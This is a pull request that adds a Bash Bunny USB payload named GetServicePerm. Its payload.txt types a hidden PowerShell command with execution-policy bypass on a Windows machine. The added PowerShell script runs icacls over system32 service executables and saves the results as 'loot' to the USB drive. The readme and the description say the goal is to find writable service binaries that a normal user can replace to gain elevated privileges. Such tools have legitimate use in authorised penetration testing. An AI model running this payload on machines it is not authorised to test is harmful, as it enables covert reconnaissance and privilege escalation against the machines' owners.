### PR TITLE
GetServicePerm - New suggested payload

### DIFF
--- a/payloads/library/recon/GetServicePerm/GetServicePerm.ps1
+++ b/payloads/library/recon/GetServicePerm/GetServicePerm.ps1
@@ -1,0 +1,8 @@
+$drive = (gwmi win32_volume -f 'label="BashBunny"' | Select-Object -ExpandProperty DriveLetter)
+
+ForEach ($item in (wmic service list full | Select-String -Pattern "PathName" | Select-String -Pattern "system32")) {
+$file = $item.ToString($item)
+icacls.exe $file.Split("=")[1].split(' ')[0] | Out-File -Append $drive\\loot\\GetServicePerm\\\$env:computername.txt
+}
+
+

--- a/payloads/library/recon/GetServicePerm/payload.txt
+++ b/payloads/library/recon/GetServicePerm/payload.txt
@@ -1,0 +1,35 @@
+#!/bin/bash
+#
+# Title:         GetServicePerm
+# Author:        Resheph @ www.postexplo.com
+# Version:       0.1
+# Target:        Microsoft Windows hosts supporting PowerShell
+# Category:      Recon
+#
+# Description:
+# When executed on a Windows host the payload gathers a list of permissions on executables used as a service.
+# This is useful when a service is executed with elevated privileges but is modifiable by everyone.
+# When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.
+# 
+# Note that you may need to change the DUCKY_LANG for this to work for you.
+
+# init
+ATTACKMODE HID STORAGE
+
+GET SWITCH_POSITION
+DUCKY_LANG dk
+
+LOOTDIR=/root/udisk/loot/GetServicePerm
+mkdir -p $LOOTDIR
+
+# Do Recon
+LED SETUP
+Q DELAY 6000
+Q GUI r
+Q DELAY 100
+Q STRING powerShell -windowstyle hidden -ExecutionPolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetServicePerm.ps1')"
+Q ENTER
+
+# Done
+sync;sleep 1;sync
+LED FINISH

--- a/payloads/library/recon/GetServicePerm/payload.txt
+++ b/payloads/library/recon/GetServicePerm/payload.txt
@@ -11,13 +11,11 @@
 # This is useful when a service is executed with elevated privileges but is modifiable by everyone.
 # When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.
 # 
-# Note that you may need to change the DUCKY_LANG for this to work for you.
 
 # init
 ATTACKMODE HID STORAGE
 
 GET SWITCH_POSITION
-DUCKY_LANG dk
 
 LOOTDIR=/root/udisk/loot/GetServicePerm
 mkdir -p $LOOTDIR

--- a/payloads/library/recon/GetServicePerm/readme.md
+++ b/payloads/library/recon/GetServicePerm/readme.md
@@ -1,0 +1,25 @@
+# GetServicePerm
+
+* Title:         GetServicePerm
+* Author:        Resheph @ www.postexplo.com
+* Version:       0.1
+* Target:        Microsoft Windows hosts supporting PowerShell
+* Category:      Recon
+
+## Description
+
+When executed on a Windows host the payload gathers a list of permissions on executables used as a service.
+This is useful when a service is executed with elevated privileges but is modifiable by everyone.
+When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.
+
+## Configuration
+
+The only thing you will need to change is the Ducky language so it matches the target.
+
+## STATUS
+
+LED SETUP
+LED FINISH
+
+## Discussion
+


### PR DESCRIPTION
When executed on a Windows host the payload gathers a list of permissions on executables used as a service.
This is useful when a service is executed with elevated privileges but the executable is modifiable by everyone.
When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.